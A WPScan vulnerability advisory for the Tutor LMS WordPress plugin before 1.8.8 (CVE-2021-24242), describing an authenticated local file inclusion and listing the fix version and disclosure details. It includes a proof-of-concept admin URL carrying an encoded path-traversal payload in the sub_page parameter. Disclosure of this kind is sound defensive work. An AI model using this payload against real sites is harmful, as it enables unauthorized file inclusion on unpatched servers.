Tutor LMS < 1.8.8 - Authenticated Local File Inclusion

Description

The plugin is affected by a local file inclusion vulnerability through the maliciously constructed sub_page parameter of the plugin's Tools, allowing high privilege users to include any local php file

Proof of Concept

https://your.domain/wp-admin/admin.php?page=tutor-tools&sub_page=..%2F..%2F..%2F..%2F..%2F..%2Findex

Affects Plugins

tutor

Fixed in version 1.8.8✓

References

CVE

CVE-2021-24242

Classification

Type

LFI

OWASP top 10

A1: Injection

CWE

CWE-22

Miscellaneous

Original Researcher

sasa

Submitter

sasa

Verified

Yes

WPVDB ID

20f3e63a-31d8-49a0-b4ef-209749feff5c

Timeline

Publicly Published

2021-04-05 (about 1 months ago)

Added

2021-04-05 (about 1 months ago)

Last Updated

2021-04-07 (about 29 days ago)

Our Other Services

WPScan WordPress Security Plugin